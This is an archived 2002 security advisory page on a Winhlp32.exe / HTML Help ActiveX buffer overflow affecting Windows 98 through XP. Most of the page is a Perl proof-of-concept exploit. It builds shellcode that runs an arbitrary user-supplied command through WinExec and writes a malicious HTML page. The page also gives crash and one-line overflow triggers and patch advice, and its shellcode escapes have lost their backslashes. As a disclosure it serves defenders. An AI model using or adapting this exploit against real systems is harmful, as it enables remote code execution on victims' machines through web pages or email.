Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows :: win5590.htm

Winhlp32.exe Remote BufferOverrun



2nd Aug 2002 [SBWID-5590]
COMMAND

	Winhlp32.exe, Windows Help System Buffer Overflow

SYSTEMS AFFECTED

	Windows XP,2000,NT,ME and 98
	

	

PROBLEM

	Mark     Litchfield      [mark@ngssoftware.com]      of      NGSSoftware
	[http://www.ngssoftware.com] in advisory [#NISR01082002] :
	

	Many of the features available in HTML Help are implemented through  the
	HTML Help ActiveX control (HHCtrl.ocx). The HTML  Help  ActiveX  control
	is used to provide navigation features (such as a  table  of  contents),
	to display secondary windows and  pop-up  definitions,  and  to  provide
	other features. The HTML Help ActiveX control can be  used  from  topics
	in a compiled Help system as well as from HTML pages displayed in a  Web
	browser. The functionality provided by the  HTML  Help  ActiveX  control
	will run in the HTML  Help  Viewer  or  in  any  browser  that  supports
	ActiveX technology, such as Internet Explorer (version 3.01  or  later).
	Some features, as with the WinHlp Command, provided  by  the  HTML  Help
	ActiveX control are meant to be available only when it is  used  from  a
	compiled HTML Help file (.chm) that is displayed by using the HTML  Help
	Viewer.
	

	 Details

	 *******

	

	Winhlp32.exe is vulnerable to a  bufferoverrun  attack  using  the  Item
	parameter within WinHlp Command, the item parameter is used  to  specify
	the file path of the WinHelp (.hlp) file in which the WinHelp  topic  is
	stored, and the window name of the target window.  Using  this  overrun,
	an attacker can successfully exectute arbitary code on a  remote  system
	by either encouraging  the  victim  to  visit  a  particular  web  page,
	whereby code would execute automatically, or by  including  the  exploit
	within the source of an email. In  regards  to  email,  execution  would
	automatically occur when the  mail  appears  in  the  preview  pane  and
	ActiveX objects are allowed (This is allowed by  default,  the  Internet
	Security Settings would have to be set as HIGH to prevent  execution  of
	this vulnerability). Any exploit would execute in  the  context  of  the
	logged on user.
	

	

	 Exploit (Update 20 August 2002)

	 =======

	

	# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com

	# For use as proof of concept

	# Kernel32.dll version 5.0.2195.4272

	####### Kernell32 jmp ebx 77E87793

	

	

	$sploit =

	"x55x8bxecx8bxc3". 		#xc5 is ebp change if error

	"xbexffxffxffxff".

	"x81xEEx85x85x85x85".

	"x83xc0x01".

	"x8bx10".

	"x3bxd6".

	"x75xf7".		

	"x8bxd8".

	"x83xc3x01".

	"x80x6bx03x41".

	"x8bx7bx04".

	"x81xffx58x58x58x58".

	"x75xEE".

	"x81x6bx04x58x58x58x58".

	"x33xf6".

	"x56".

	"x83xc0x04".

	"x50".

	"xbbx94xeexe8x77".		# mov ebx, 0x77e8ee94 winexec() address

	"xffxd3";			#call ebx

	

	

	$exitproc = 

	"xBBx5dxa9xe8x77".

	"x83xebx01".

	"xffxd3";

	

	

	$RET = "x24xF1x5dx01";

	$EIP2 = "x93x77xe8x77";  # This works

	#$EIP2 = "xf6xbfx30x78";

	

	# direct jump = 0006FBD4 ##$EIP2 = "xd4xfbx06x00";

	

	print "Exploit code for Winhlp32.exe Remote BufferOverrun.nBy Gary Oleary-Steele Sec-1 LtdnCalls WinExec SW_HIDE and executes supplied commandnTested on windows 2000 professional SP2nn";

	print "Enter Command to execute: ";

	$command =<STDIN>;

	print "Enter Output File: ";

	$outputfile =<STDIN>;

	chomp $command;

	chomp $outputfile;

	open(INFILE,">$outputfile");

	$command = encode($command);

	$nn = 123 - length($command);

	$nops = "x90" x $nn;

	

	

	

	$exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET .$EIP2;

	

	

	

	

	$f1= <<"file1"; 

	<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11

	codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp

	type=application/x-oleobject width=0><PARAM NAME="Width"

	VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"

	VALUE="WinHelp"><PARAM NAME="Item1"

	VALUE='

	file1

	chomp $f1;

	

	$f2= <<"file2";

	'><PARAM

	NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>

	<SCRIPT>winhelp.HHClick()</SCRIPT>

	file2

	

	print INFILE $f1.$exploit.$f2;

	

	

	

	sub encode($command){

	$lofcmd =length($command); 

	$i = 0;

	

	for ($i ;$i < $lofcmd; $i++){

	

	

	$chartoconvert = substr($command,$i,1); # pull out each character

	

	$chartoconvert = ord($chartoconvert); # convert to a dec 

	

	for ($b=0; $b < 65; $b++){

	$chartoconvert++ ;

	}

	

	$tmpchr = chr($chartoconvert); #convert back to chr

	$newchar = $newchar . $tmpchr;

	

	

	

	}

	

	print $newchar;

	return $newchar;

	

	}

	

	

	-Also-
		

	Jelmer adds :
		

	I just installed servicepack 3 and the following code still  crashed  my
	my IE6 with a memory could not be refferenced error.
	

	<OBJECT ID=hhctrl TYPE="application/x-oleobject"

	CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

	<PARAM name="Command" value="Shortcut">

	<PARAM name="Button" value="Bitmap:shortcut">

	<PARAM name="Item1" value=",,">

	<PARAM name="Item2" value="273,1,1">

	<PARAM name="codebase" value="">

	<PARAM name="Font" value=" A VERY VERY LONG STRING ">

	</OBJECT>

		

	I have been told this means it is most  likely  exploitable.  I  am  not
	into buffer overflows myself though, maybe  someone  can  confirm  this.
	Anyways I notified microsoft of this several months ago. The  day  after
	I notified them someone pointed me to the  ngssoftware  advisory  *sob*,
	and I notified microsoft that this was probably the same issue,  last  I
	heard from them they where looking in to if this was  indeed  the  case.
	It's been several months and as far as I know they are still looking.
	

	 Update (03 October 2002)

	 ======

	

	David  Litchfield  [david@ngssoftware.com]  of  NGS   Insight   Security
	Research in a new advisory [#NISR02102002], says :
	

	 http://www.ngssoftware.com/advisories/ms-winhlp.txt

	

	

	--snapp--
	

	The Windows Help system includes an ActiveX control known  as  the  HTML
	Help Control, hhctrl.ocx.  The  "Alink"  function  of  this  control  is
	vulnerable to a buffer overflow that can be exploited  to  gain  control
	of the user's machine.
	

	--snapp--
	

	

	 Update (10 October 2002)

	 ======

	

	In Thor Larholm [thor@pivx.com] advisory [http://www.pivx.com] :
	

	--snipp--
	

	we feel that it will benefit and empower endusers more if they are  able
	to easily verify for themselves whether  they  are  using  a  vulnerable
	version of Windows Help. Others have recently made the public  aware  of
	this  vulnerability  as  well,  though  without  disclosing  any  actual
	details.
	

	Exploit:
	

	<script>showHelp( A*796 );</script>

	

	

	Simple, oneclick testcase
	

	http://www.pivx.com/larholm/adv/TL004/simple.html

	

	Try your own numbers
	

	http://www.pivx.com/larholm/adv/TL004/number.html

	

	

	--snapp--

SOLUTION

	NGSSoftware highly recommend installing Microsoft Windows  SP3,  as  the
	fix has been built into this service pack found at
	

	http://www.microsoft.com

	

	An alternative  to  these  patches  would  be  to  ensure  the  security
	settings found in the Internet Options  is  set  to  high.  Despite  the
	Medium setting, stating that  unsigned  ActiveX  controls  will  not  be
	downloaded, Kylie  will  still  execute  Calc.exe.  Another  alternative
	would be to remove winhlp32.exe  if  it  is  not  required  within  your
	environment.
	

	 Update (03 October 2002)

	 ======

	

	Microsoft have produced a patch which is available from their web  site.
	More details are available from :
	

	http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-055.asp

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH